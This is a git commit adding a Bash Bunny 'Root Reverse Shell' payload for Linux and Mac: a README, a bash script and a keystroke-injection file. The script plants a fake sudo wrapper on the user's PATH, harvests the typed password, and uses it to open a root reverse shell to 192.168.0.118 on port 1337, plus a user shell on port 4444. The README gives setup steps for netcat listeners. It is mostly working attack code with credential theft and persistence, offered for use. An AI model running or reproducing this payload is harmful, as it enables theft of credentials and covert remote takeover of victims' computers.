Updated changes suggested by darren
parent
27332a9f14
commit
7103031e6e
|
@ -0,0 +1,17 @@
|
||||||
|
# Root_Reverse_Shell_linux_mac
|
||||||
|
|
||||||
|
### Since i dont have a bash bunny this is tested in digispark
|
||||||
|
### I have converted this script to bash bunny
|
||||||
|
### If any issues put in discussion i will fix it
|
||||||
|
POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
|
||||||
|
### Special thanks to sudobackdoor for bash script sample
|
||||||
|
Dont forgot to change IP in payload.sh
|
||||||
|
Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
|
||||||
|
Because it gives both user shell and root shell
|
||||||
|
|
||||||
|
When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server
|
||||||
|
then executes it and removes the payload.sh.
|
||||||
|
|
||||||
|
Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
|
||||||
|
|
||||||
|
The reason for two netcat connection is user level connection established when script is executed. But to obtain root credenitals it requires time because the user need elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.
|
|
@ -0,0 +1,55 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
if [ ! -d ~/.config/sudo ]
|
||||||
|
then
|
||||||
|
mkdir -p ~/.config/sudo
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ -f ~/.config/sudo/sudo ]
|
||||||
|
then
|
||||||
|
rm ~/.config/sudo/sudo
|
||||||
|
fi
|
||||||
|
|
||||||
|
|
||||||
|
echo '#!'$SHELL >> ~/.config/sudo/sudo
|
||||||
|
cat <<'EOF' >> ~/.config/sudo/sudo
|
||||||
|
/usr/bin/sudo -n true 2>/dev/null
|
||||||
|
if [ $? -eq 0 ]
|
||||||
|
then
|
||||||
|
/usr/bin/sudo $@
|
||||||
|
else
|
||||||
|
echo -n "[sudo] password for $USER: "
|
||||||
|
read -s pwd
|
||||||
|
echo
|
||||||
|
echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
|
||||||
|
if [ $? -eq 1 ]
|
||||||
|
then
|
||||||
|
echo "Sorry, try again."
|
||||||
|
sudo $@
|
||||||
|
else
|
||||||
|
/usr/bin/sudo -S $@
|
||||||
|
if [ -f ~/.bash_profile ]
|
||||||
|
then
|
||||||
|
rm ~/.bash_profile
|
||||||
|
mv ~/.darkbash ~/.bash_profile
|
||||||
|
else
|
||||||
|
rm ~/.bashrc
|
||||||
|
mv ~/.darkbashrc ~/.bashrc
|
||||||
|
fi
|
||||||
|
rm ~/.config/sudo/sudo
|
||||||
|
echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) &
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
EOF
|
||||||
|
|
||||||
|
chmod u+x ~/.config/sudo/sudo
|
||||||
|
if [ -f ~/.bash_profile ]
|
||||||
|
then
|
||||||
|
cp ~/.bash_profile ~/.darkbash
|
||||||
|
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
|
||||||
|
else
|
||||||
|
cp ~/.bashrc ~/.darkbashrc
|
||||||
|
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
|
||||||
|
fi
|
||||||
|
disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) &
|
||||||
|
bash
|
|
@ -0,0 +1,49 @@
|
||||||
|
# Title: Linux/Mac Reverse Shell
|
||||||
|
# Author: Darkprince(Sridhar)
|
||||||
|
# Version: 1.0
|
||||||
|
#
|
||||||
|
# Runs a script in the background that gives a user shell initially and waits for user to
|
||||||
|
# escalate privileges and give a root reverse shell
|
||||||
|
#
|
||||||
|
# Magenta..................Setup
|
||||||
|
# Red,Green,Blue......Executing
|
||||||
|
# Green....................Finished
|
||||||
|
|
||||||
|
|
||||||
|
# INITIALIZING
|
||||||
|
LED W
|
||||||
|
|
||||||
|
# Mac keyboard works in linux and mac
|
||||||
|
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
||||||
|
|
||||||
|
LANGUAGE='us'
|
||||||
|
|
||||||
|
# Make sure the switch position is 1
|
||||||
|
|
||||||
|
# ATTACKING
|
||||||
|
LED R G B
|
||||||
|
|
||||||
|
# Get linux,mac Termial
|
||||||
|
RUN UNITY xterm
|
||||||
|
Q DELAY 1000
|
||||||
|
# To close opened window by linux run command
|
||||||
|
Q GUI Q
|
||||||
|
Q CTRL C
|
||||||
|
RUN OSX terminal
|
||||||
|
Q DELAY 1000
|
||||||
|
|
||||||
|
# If linux then clearing 'terminal' which is typed by mac run script
|
||||||
|
Q CTRL C
|
||||||
|
|
||||||
|
# Executing bash script which is same for mac and linux
|
||||||
|
Q STRING bash /Volumes/BashBunny/payloads/switch1/payload.sh
|
||||||
|
|
||||||
|
# The cleanup process will done by bash script
|
||||||
|
# Closing the xterm in linux
|
||||||
|
# Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal
|
||||||
|
Q GUI Q
|
||||||
|
Q CTRL C
|
||||||
|
Q STRING exit
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
LED G
|
Loading…
Reference in New Issue